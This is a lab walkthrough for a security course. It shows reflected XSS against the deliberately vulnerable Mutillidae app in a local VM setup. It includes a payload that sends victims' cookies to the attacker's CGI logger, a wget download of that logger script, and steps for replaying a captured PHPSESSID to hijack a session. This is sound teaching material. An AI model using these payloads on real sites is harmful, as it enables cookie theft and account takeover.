{ Reflected Cross Site Scripting Injection #1,
Man-In-The-Middle Attack }
Section 0. Background Information |
- What is Mutillidae?
- OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
- What is Cross Site Scripting?
- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications.
- XSS enables attackers to inject client-side script into Web pages viewed by other users.
- A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
- In Addition, the attacker can send input (e.g., username, password, session ID, etc) which can be later captured by an external script.
- What is a Man-In-The-Middle attack?
- The man-in-the-middle attack take on many forms. The most common form is active network eavesdropping in which the attacker is able to gain authentication credentials (Username, Password, SESSIONID, Cookies Information, etc).
- What is Cookie Manager+?
- Cookies manager to view, edit and create new cookies. It also shows extra information about cookies, allows edit multiple cookies at once and backup/restore them
- Pre-Requisite Lab
- Mutillidae: Lesson 1: How to Install Mutillidae in Fedora
- Note: Remote database access has been turned on to provide an additional vulnerability.
- BackTrack: Lesson 1: Installing BackTrack 5
- Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
- BackTrack: Lesson 9: How To Install Firebug
- Note: Firebug integrates with Firefox to put a wealth of web development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
- BackTrack: Lesson 10: How To Install Cookies Manager+ 1.5.2
- Note: Cookies manager to view, edit and create new cookies.
- Lab Notes
- In this lab we will do the following:
- Due to a purposely bug in the dns-lookup.php code, we will use Reflected Cross Site Scripting Techniques to test for vulnerabilities.
- We will capture UserID and Session Cookie Data.
- We will send captured UserID and Session Cookie Data to a remote location.
- We will use captured UserID and Session Cookie Data to re-enter the website.
- Legal Disclaimer - bài hướng dẫn học tập
Section 1. Configure Fedora14 Virtual Machine Settings |
- Open Your VMware Player
- Instructions:
- On Your Host Computer, Go To
- Start --> All Program --> VMWare --> VMWare Player
- Edit Fedora Mutillidae Virtual Machine Settings
- Instructions:
- Highlight fedora14
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_thpaDE_ZpFUnpyewuBuLDavJ-o-h9gs_C95x7GNHgRkt2FDQJTwmu3Tv-_YfEjaBFkR-9jlziPNgmvv8L7GYYkNJ-ycz-G4T-zC4lYMdzqMg4HdY4SOhqAw3dLsmQPQxwCsMfI0HBm4BOXtKnGPBSGNmhhl2Mn4bWS4E6a18ZoMMJgf37a967A=s0-d)
- Edit Network Adapter
- Instructions:
- Highlight Network Adapter
- Select Bridged
- Click the OK Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uBSwNMKXYi4BUyPwyeWojQkgk6alb4uO7_UTuRH25OYWAYXa9NpeSzBH4hvgP3KBKryHjK-0DHFCzuHVTeiv4PApOrCMUXC7FEdK6rZNzMCRGfYk4H0MxJoG3dyNj2BdMj7YR4umhXwvi6YTS0u1lZ4V0JMPiu7lrcYn0bhdH08BHLYJ53t5hc=s0-d)
Section 2. Login to Fedora14 - Mutillidae |
- Start Fedora14 VM Instance
- Instructions:
- Start Up VMWare Player
- Select Fedora14 - Mutillidae
- Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_segvzCTaTsWeUHmhhCkDgabLwOn61zMHjShecFhEw6lkGig8wxiETOyHOF2DwwYh0PQqqoZBBbk0KV7LHpsFPe89GabWBUekHvtODX9f2Ht4V_YWOQsMhPru5-B8upxPAbEgCB_C4Ld9I8AQ_NqI-PsZMjxcytYB3hJE4AcZQaKaspbLS9vq_oovg=s0-d)
- Login to Fedora14 - Mutillidae
- Instructions:
- Login: student
- Password: <whatever you set it to>.
-
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vBP5-MmfpjjDVwP4O178ZpukEi2ESYatYXBui5kScIyULoN7JBMaWWyJGnwKfuH9rSFN59m8wdIuUPm-i4tT-KDr7FD3aDIpgpVZmn3gUJ66nshaOE5VEFchsVtCgn-2fVKfQqACpMpgljiLGPli7fCtLQ2vZ7pmgfb9J6P6v9OhUSS5DErVYaXw=s0-d)
Section 3. Open Console Terminal and Retrieve IP Address |
- Start a Terminal Console
- Instructions:
- Applications --> Terminal
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uTjNF7V_OmEptV5Ell1Kjrcz1fUCfYoP5AoPoqAXnmf79MU2ej5qDoInoYV_-NlsQHQ7XRu1ih32ro7byy6VCDW3_c3ZCN9qMCB7msIE60jvdcQM603J1I0Igcq33fBrGHKsxr3haAaU_RjJ8V9L2CAhzN7Um7j4SNvdI8fNdPUv6UXCzr3ZsrqKE=s0-d)
- Switch user to root
- Instructions:
- su - root
- <Whatever you set the root password to>
-
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tsPT3f_lY5ZNvqdH_BJg55f-_wW7mq4HKp0oxMHBp7nTuh52uoCHszYJeywkso_ir9Yg164J_eJbS-TYrzzzDpbN2U2YTkJm2vhqvFlbsEXHU2ut3kGzSU2Up-hUDJGs_PZtZ5RSeNh3doiw79-dd1BaNI31D2hE0qncs9p5w2KvLEIn6DOTGVs8A=s0-d)
- Get IP Address
- Instructions:
- ifconfig -a
- Notes (FYI):
- As indicated below, my IP address is 192.168.1.111.
- Please record your IP address.
Section 4. Configure BackTrack Virtual Machine Settings |
- Edit the BackTrack5R1 VM
- Instructions:
- Select BackTrack5R1 VM
- Click Edit virtual machine settings
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uhc9k37_ZwStFebh4Pp1F4jRC3RhSAT7iHID21hACc6M51m6n8ZLmnFcxe7JFWsnMim6sLSamHhZAAjkZbVaUrlRWXl0gur2h5mXGxoZPNfkXTucTXWnZ4KbxgAhveNTu0uqEw9moxLNqd98Zrcp0t_SOEyH1TOBzFWGuM3AuQuGZ-Vn1hW7s=s0-d)
- Edit Virtual Machine Settings
- Instructions:
- Click on Network Adapter
- Click on the Bridged Radio button
- Click on the OK Button
Section 5. Play and Login to BackTrack |
- Play the BackTrack5R1 VM
- Instructions:
- Click on the BackTrack5R1 VM
- Click on Play virtual machine
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tTxX_uci5aVYZ-atapGCCUh-3Wbbl4O-hmeuFpljMYhMgxoEgu6liUCE45e_DubWxgT_mO_QJsuetx4gpm5YTJZx6W9RM7Y2a8rYu3BOB55fYuI3lCZLZ4NwTE0xsQ4rpyi43-ufdiqKTXshPwo9bfYJLxq6iEl0TTsB271JoYdQdQCey8PdU=s0-d)
- Login to BackTrack
- Instructions:
- Login: root
- Password: toor or <whatever you changed it to>.
- Bring up the GNOME
- Instructions:
- Type startx
Section 6. Open Console Terminal and Retrieve IP Address |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Obtain the IP Address
- Instructions:
- ifconfig -a
- Note(FYI):
- My IP address 192.168.1.112.
- In your case, it will probably be different.
- This is the machine that will be use to attack the victim machine (Mutillidae).
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ufocg0Ns1YLF3_wPOvoL2uu1-23lvJlPO_FJBkFTQRan--bleBJw-aLgi7EhInK4s-eCdyuPE573Xf7PTwkFEuYnIE5-Q5fozOz_4-yIYCo-6lcZuZ3qaSFH-FM7UnxTIQjAKiVdYnVTvq90mwXSGhMqtMMXexick1H2aX-aK-MrHjScJNt5mgcQ=s0-d)
Section 7. Navigate to "DNS Lookup" |
- On BackTrack, Open Firefox
- Instructions:
- Click on the Firefox Icon
- Notes (FYI):
- If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tw1XJw4ZXuQhC-DTosfkh-ua4xKgz8xBoVwVL-QahXE_N6dP07nUv7aY590AaSCbd5tBP2s_MeWYLEoolAirJEukCkIpTcx3Mhqjibipd_mM27CWM5dkTolvPN5rwax_Y6Jj4EZUkEaorlATUa4KnjEydMLwySpMgq_ale3pcPiVfTQ4HwwWuq-g=s0-d)
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Click Login/Register
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sXbjbcxKM95aoAU_58baI2KTQOOAnZf9da_NMTFfZem8e5LkRMOSz5btdMuqlsKPlq7W4VZ3lUMu0OMkZ4l9tEIHISOMvnW9qTlHSD151HbzbO_z-UtNvYM7Gb70Z-egH5wsdz4eaiqwd-zddhcF9nEclGR382Qv3TGl7LbEARlMxzRoZ3G5V2g_E=s0-d)
- Login
- Instructions:
- Name: samurai
- Password: samurai
- Click the Login Button
- Notes(FYI):
- We are logging on to Mutillidae to simulate a user logging on to a real application and being granted a Session ID.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vXq9hGF1yzVMKyiSVN6TaDskVnu9epLsYjxd9_-pb9kUX_n0z8fM_zBF7Z_xaAm7uzLJS8Ayh-l-hLgKmJhb8UJ6jRw_fvXrZz3GnKriMtp8pbA5-7BXdmwZgUN1LctwUVcC9lPKuhEAUpLlVt8qgGySSkjADXkv3m2g8wmvzuqNrOqirD58QdfX8=s0-d)
Section 8. Reflected Cross Site Scripting (XSS) Injection #1 - Popup Window |
- DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uguoGdUR-RD4Qi6-APH_z0X_EOtY6s8ZurjDNv4N4cnUYDsN3NSSpmfU0Wockq9T19Z2wIu-5_ASD9RLgZbvv1dezb0ZNkCw2-rzkAIp48dzdk-O_51_yt4qoAK24Meq-T6GdFLeAruK2WmCNtoObDYTW1PXCXjpS6HJr_CQVTajrxLX8ffzehm6g=s0-d)
- Inspect Textbox Element
- Instructions:
- Right Click in Hostname/IP Textbox
- Click on Inspect Element
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCo_tv5P5cXm_WjOO0E0C_ukNxSopirsIHdkCYnUb9VYqrJmrnxETw5_KM9Vj0IPBjtcyCj-ZAjT4fmlE4HFp3jFYMnUaf1D3VIUVB3KkkQxrfObXsgp6mbNzlQDWbxyz2UuAAXWvoqo9Lr_UGTZrYRPjXlhTWTIaXmnU8LXeoBSmlP2q4HQoGe2Y=s0-d)
- Change Text Box Size
- Instructions:
- After the string "size=", Change 20 to 100. (See Picture)
- Click on the Close Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u0FBRcDOxEnCQvcKiuUB5ro7wQIDU5wKZZWMP4cZ9nCNpWeqosj5f04LNcuJ7Jk1BIJnJ1hQ4FVHnM-8dcaJWFHLPxJ894sroqoIIiF6SY_ri8zknDs1bjmSuAIyy392U-3ZwCPqqsaoYEmnOWZZm25E8iQcR8v9YvzaJoXxVqlJa78n3Ek9pPOw=s0-d)
- Test Cross Site Script (XSS) Injection
- Instructions:
- In the Hostname/IP Textbox place the following string
- <script>alert("Hello")</script>
- Click the Lookup DNS Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uEjoUpWnsWbxa3PX5G6-PGl1oxtJGvdV1PgQWU78EgVzo1jbfabn1fQabLLQk4OtFysULDrtYSp2rktuNJHLHdCWcbr6XmRKgjz6bM2_F_YQMhjDohD_2ZQucMKFITfPpb5-LnISLgt1BygD0ITKPVlSYrJrSZ3iT03HcjS3qpGVUzPKkybgsngA=s0-d)
- View Cross Site Script (XSS) Injection Results
- Note(FYI):
- The fact that we can pop up a JavaScript alert box indicates this webpage is susceptible to Cross Site Script Injections.
- Instructions:
- Click the OK Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tsaFAvLRwDJXlxN1RweczNYMQ8EH-3ASbc-XJUYFrBGpfubqLA48O8182pPIV_7kOMtFg9Mwyahrn4i5xTGLzzuXYenWjzy9_YEle2oxKsEidc7Tf47PfAr9M3bSTdA_NIEbOmgU1ht8wbmgK4QpAokXRSo51wt3oVghf0giBpDuV11s2VOpkXiqI=s0-d)
Section 9. Reflected Cross Site Scripting (XSS) Injection #2 - Popup Cookie |
- DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uguoGdUR-RD4Qi6-APH_z0X_EOtY6s8ZurjDNv4N4cnUYDsN3NSSpmfU0Wockq9T19Z2wIu-5_ASD9RLgZbvv1dezb0ZNkCw2-rzkAIp48dzdk-O_51_yt4qoAK24Meq-T6GdFLeAruK2WmCNtoObDYTW1PXCXjpS6HJr_CQVTajrxLX8ffzehm6g=s0-d)
- Inspect Textbox Element
- Instructions:
- Right Click in Hostname/IP Textbox
- Click on Inspect Element
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCo_tv5P5cXm_WjOO0E0C_ukNxSopirsIHdkCYnUb9VYqrJmrnxETw5_KM9Vj0IPBjtcyCj-ZAjT4fmlE4HFp3jFYMnUaf1D3VIUVB3KkkQxrfObXsgp6mbNzlQDWbxyz2UuAAXWvoqo9Lr_UGTZrYRPjXlhTWTIaXmnU8LXeoBSmlP2q4HQoGe2Y=s0-d)
- Change Text Box Size
- Instructions:
- After the string "size=", Change 20 to 100. (See Picture)
- Click on the Close Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u0FBRcDOxEnCQvcKiuUB5ro7wQIDU5wKZZWMP4cZ9nCNpWeqosj5f04LNcuJ7Jk1BIJnJ1hQ4FVHnM-8dcaJWFHLPxJ894sroqoIIiF6SY_ri8zknDs1bjmSuAIyy392U-3ZwCPqqsaoYEmnOWZZm25E8iQcR8v9YvzaJoXxVqlJa78n3Ek9pPOw=s0-d)
- Test Cross Site Script (XSS) Injection
- Instructions:
- In the Hostname/IP Textbox place the following string
- <script>alert(document.cookie)</script>
- Click the Lookup DNS Button
- Note(FYI):
- The goal here is to determine (1) if this webpage contains a cookie AND (2) if we can display the cookie in a JavaScript alert box.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sHO1AuIBtOGrO_hVz3pRU3LhNvhWOrf9UsmPbUqvTYXFGraeoa3AjHptwm00QRM6F2FXb2JadZTanwXtknSUvA7xZ6Il1R2uN2JXG8L4n-32yAe8G2vZcrS1ozccihWLobdC04f8D2VzVorBWXFbUDjaJmaltxZ3DxFCGZMY1W1NrrjCoptaXuJA=s0-d)
- View Cookie
- Instructions:
- Notice the cookie displays the username
- Notice the cookie displays the PHP Session ID.
- Click the OK Button
- Notes(FYI):
- Imagine if this was a bank website and every time a user logs in their cookie information was sent to a remote location.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tqRLIQvBE_dV7_p6GIeEdbQCfPfE62M_5cPotM7ZHYhHTTgzdpMXnXPuzQabnKAHzhKMaYLbTnoCGKNPNA0b68ZrSmZC1JD8jvh-is4_cpna_L51YCfja1DZhvfE8ikzLtrFs48cNP4kWBrF19x1MKsXpsp8vvUJj9YSCLsdxJ-2W0VKx6RoLN2VQ=s0-d)
Section 13. Prepare BackTrack CGI Cookie Script |
- On BackTrack, Start up a terminal window
- Instructions:
- Click on the Terminal Window
- Start Apache2
- Instructions:
- service apache2 start
- service apache2 status
- ps -eaf | grep apache2 | grep -v grep
- Note(FYI):
- Start up the apache2 webserver.
- Display the status of the apache2 webserver.
- See the processes of the apache2 webserver.
- Make Apache Log Directory
- Instructions:
- mkdir -p /var/www/logdir
- chown www-data:www-data /var/www/logdir
- chmod 700 /var/www/logdir
- ls -ld /var/www/logdir
- Note(FYI):
- Make a directory called logdir inside of /var/www
- Set the ownership of logdir to www-data
- Set the permission of logdir to where only the apache2 process (owned by www-data) can read, write and execute to this directory.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t_kC6SUZHpWv3RoXyWw-FfyY4Pi9vbOAW1dqTuP5g181FD4Nv4_YguTaGzTDkno0zUyc8zmdD2k9xfeuY-IlSl4XX3h-F3cHrURJ5BpQHm8dn1KD0sZUjnFh7SFgQzED-Jj_hZRZVidhootBY4JizfNjKuQoeq2nZc-cYMvXCDq-Le_amlC6aBMw=s0-d)
- Configure CGI Cookie Script
- Instructions:
- cd /usr/lib/cgi-bin
- wget http://goo.gl/Zb5MZe
- mv logit.pl.TXT logit.pl
- chown www-data:www-data logit.pl
- chmod 700 logit.pl
- perl -c logit.pl
- Note(FYI):
- Change directory to /usr/lib/cgi-bin
- Use wget to download the CGI Cookie Script
- Rename Script
- Set ownership of script to www-data, which is the same owner of the apache2 webserver processes.
- Set permission to where only the www-data user can read, write and execute the script.
- Check the syntax of the CGI Cookie Script (logit.pl)
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sggFeNEyID29SiW1o13BAVIsg4QMcGNwjNdwwpchxYTxF0vVW9cVAf-pprJOK6rennu6XgIVZOkRYLC-el5DgFKzt8gsiI1e4wBlMzVOHH_LLr3g7Bd8zSp00pOZlYJgSv_pYqVKVKHhM57mm86eR1AC9HJmflH3Ao9CWYzkqpIQHM2xswyC1pG3U=s0-d)
Section 14. Reflected Cross Site Scripting (XSS) Injection #2 - Popup Cookie |
- DNS Lookup
- Instructions:
- OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uguoGdUR-RD4Qi6-APH_z0X_EOtY6s8ZurjDNv4N4cnUYDsN3NSSpmfU0Wockq9T19Z2wIu-5_ASD9RLgZbvv1dezb0ZNkCw2-rzkAIp48dzdk-O_51_yt4qoAK24Meq-T6GdFLeAruK2WmCNtoObDYTW1PXCXjpS6HJr_CQVTajrxLX8ffzehm6g=s0-d)
- Inspect Textbox Element
- Instructions:
- Right Click in Hostname/IP Textbox
- Click on Inspect Element
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCo_tv5P5cXm_WjOO0E0C_ukNxSopirsIHdkCYnUb9VYqrJmrnxETw5_KM9Vj0IPBjtcyCj-ZAjT4fmlE4HFp3jFYMnUaf1D3VIUVB3KkkQxrfObXsgp6mbNzlQDWbxyz2UuAAXWvoqo9Lr_UGTZrYRPjXlhTWTIaXmnU8LXeoBSmlP2q4HQoGe2Y=s0-d)
- Change Text Box Size
- Instructions:
- After the string "size=", Change 20 to 100. (See Picture)
- Click on the Close Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u0FBRcDOxEnCQvcKiuUB5ro7wQIDU5wKZZWMP4cZ9nCNpWeqosj5f04LNcuJ7Jk1BIJnJ1hQ4FVHnM-8dcaJWFHLPxJ894sroqoIIiF6SY_ri8zknDs1bjmSuAIyy392U-3ZwCPqqsaoYEmnOWZZm25E8iQcR8v9YvzaJoXxVqlJa78n3Ek9pPOw=s0-d)
- Test Cross Site Script (XSS) Injection
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
- Instructions:
- In the Hostname/IP Textbox place the following string
- <SCRIPT>document.location='http://192.168.1.112/cgi-bin/logit.pl?'+document.cookie</SCRIPT>
- Click the Lookup DNS Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sx-HQoHEo7SuYFf1cQ62t95PKOKaC1mdH7ATDQL5lv3Clko7yprH30sXUQCv2Gco33Pa_SQX8Dl9Q2KiSbF1neWp3TE1gJ8hWGeKF6p4HF0DGqpMPB8TXJyPQn40iIpvcxjD-o86y3VZl2CK65dUVRbT1IZrJGnhoUTQawuBpm1670O7OfCZKi4po=s0-d)
- View Cookie Script Results
- Instructions:
- Notice the Mutillidae IP Address and Vulnerable Weblink
- Notice the cookie username
- Notice the cookie PHP Session ID.
- Notes(FYI):
- Note a malicious person would not actually display the results back to you once you click a button.
- Continue to the next step to see where a malicious person might store this data.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uu5AF5Yk54klKvuAhLmSz6lrZhCVQJk2dzVn-sZeu-DjvH4bQUIvHGHVwUvVDAU_Gq6zjCP6dizHJAr-UU-m2mmuNbhRCI2fu0PVG5eegxp8O0Brq6FeX-KjTBA6CTTogFD-CXCOHE8pROuYOBekdt5f91QBVSX4kxNVtPyaL3-T1SAiIpwTRsKj8=s0-d)
- View Cookie Script Log File
- Note(FYI):
- Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
- Now we have a running log file of IP Addresses, Cookie usernames, and Session IDs of potential victims.
- Pretty scary stuff. This is why it is necessary for web developers to (1) use encoding and (2) test their site for XSS injection attempts.
- Instructions:
- Place the following URL in the Address Textbox
- http://192.168.1.112/logdir/log.txt
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_voRxVnm2-uUpi8rHzoYu0d3u1Nie3he9ufadz07J7iHtM87p_NTE2eXwGFLzwIKXkW-3mCjvpDODqpAuKLkdnDcBDs8JrHUGT7Dgw3Ds0iTqA0DQraue-W8vYV9UOIGMQrgPFnF3kFJSlPh3M49Az-mXehRE_puKufRB2ttvC3iztpvEksqhijec0=s0-d)
Section 16. Simulate Man-In-The-Middle Attack |
- Start Cookies Manager+
- Notes (FYI):
- Click here to install Cookie Manager+ you have not already done so.
- Instructions:
- Tools --> Cookies Manager+
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ucnZY6kCv7gHupp-V1krKjG89gImAPuZ1s9_z2yfg4r4HGPeSGVYW-1ORMIZoXuVFAAhcNDJhSfHyjWcGWLgx85MusJxrYSrLMXm8wDTg6e3QwF4PdRLawWnnuuB93bSEsi2ne67WsKPDDM9qWxO9F-BGsyPnDbbnf0OsYrkwFZnJQWtulBsgP5g=s0-d)
- Add Cookie Entry
- Instructions:
- Click the Add Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sJaMdHYDgvBLRROBPkQ8Z8a37UYwWkr0R9KrRE_-0PW7e6xfVTMijBJUk3qEuBoFVioBPYCvmC4mdbKp6XJcy63xyxIVlSIr_aCpgZlPX_JdkywnrSSuIIXS3nu3QRb9o1qv9PdWOIxKg85OmC6AzfNHwhc6gYkx_HGN7sKhPMJjswWH7stFK2L8w=s0-d)
- Add PHPSESSID Cookie Entry
- Note(FYI):
- Replace 6lmbhjodbtnj6o5ajuli7p1s24 with your PHPSESSID See Below Picture).
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Name: PHPSESSID
- Content: 6lmbhjodbtnj6o5ajuli7p1s24
- Host: 192.168.1.111
- Path: /
- Click the Save Button.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t0lw_0IZP8-IRD2gj7V83JApY81IKP1O4PR31OJ_NhTeR-oD825cGEaD05FhagJtDfJkidkdlblOKKO17DTHG_XMGolNv7v0kZlXUWikGqg6KHdLf2Daza5uDF0_qW32f95EFpCabqo5BJ7yT0wJ_qH332KJRtupx7o0AJSLD_E8S7eQdUOuOacw=s0-d)
- Add showhints Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Click the Add Button
- Name: showhints
- Content: 0
- Host: 192.168.1.111
- Path: /mutillidae/
- Click the Save Button
- Add username Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Click the Add Button
- Name: username
- Content: samurai
- Host: 192.168.1.111
- Path: /mutillidae/
- Select Date
- Increase the Date by 1 or 2 days
- Click the Save Button
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vMV5sHYgOKrfSAWiAJgV2OdaikUA_Lqq5sFzfw9uGvKXwRsOpbuNMF-Cw9_wpiIHaqYZat_YrRqOUsBnEhxEof650WiPhGNepjZIs_xRO4228qtcfHvp-k-ilPkDYHRSOcT4uOEFYC1mdzaFU1WqY_5PSaA-8P3aqI8Ys3U9j-Z4Wht__2WnXUNQ=s0-d)
- Add uid Cookie Entry
- Note(FYI):
- Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
- Instructions:
- Click the Add Button
- Name: uid
- Content: 6
- Host: 192.168.1.111
- Path: /mutillidae/
- Select Date
- Increase the Date by 1 or 2 days
- Click the Save Button
- Click the Close Button
- Close Firefox
- Note(FYI):
- So, lets test our theory and see if we can still get into the website using the username (samurai) and PHP Session ID we captured.
- Instructions:
- File --> Quit
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tqivKkvzFCyoYvPZYpLLRFeMMWI4Jz2Xzc5WIKv9fthjEnM7kS7Zz_H6aM4k0qaTK3MpYu_g4zB9iLYbEuAy5JrUTk3KQdRfgzfGq3t9U2Qy17v1uATKoSQqJkgxyGB55RKtAuzj9JFf0rOuX6iiERyNSxjcbZNTR8GbVOPL9kMMxcteFeMYLrNnw=s0-d)
- Open Mutillidae
- Notes (FYI):
- Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
- Instructions:
- Place the following URL in the Address Bar
- http://192.168.1.111/mutillidae/
- Notice samurai is logged in without us clicking Login/Register.
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tSH3NY5qP9o3ZoGWsyGpp-4_Mq2UOk0TwYVdve9EpVrkMAHVhedccwgGjJe6BdpqoRyXtA8L5pW84O6gsLVn69nMTN71p3IaHeXUnGROdlIcY8cB0G1RZwAi1kc76uavkLn68iJRkTdSG3XOLTk-FRblt6qLwyiTCTA19VOKu9RE2MUsFyEbeJyg4=s0-d)
- Proof of Lab, (On a BackTrack Terminal)
- Instructions:
- cat /var/www/logdir/log.txt
- date
- echo "Your Name"
- Replace the string "Your Name" with your actual name.
- e.g., echo "John Gray"
- Proof of Lab Instructions:
- Do a PrtScn
- Paste into a word document
- Upload to website www.antoanthongtin.edu.vn
-
![](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZO1TDMZOpTrN6U43xqZGBmQlc4exptgA0j7husES20H9suvpL1SeEUo4bt37nN80mR3jJk3qIIZkNDfUjh4sRN3eC45UjcIjFQs-AiytJxe28PZGk36OEwvy9496zCAkrvwvktTT-ELL8OBvgUJEKy8C3o2BjPE2V81Id1dkv522tDr8s2BeBu1E=s0-d)
Không có nhận xét nào:
Đăng nhận xét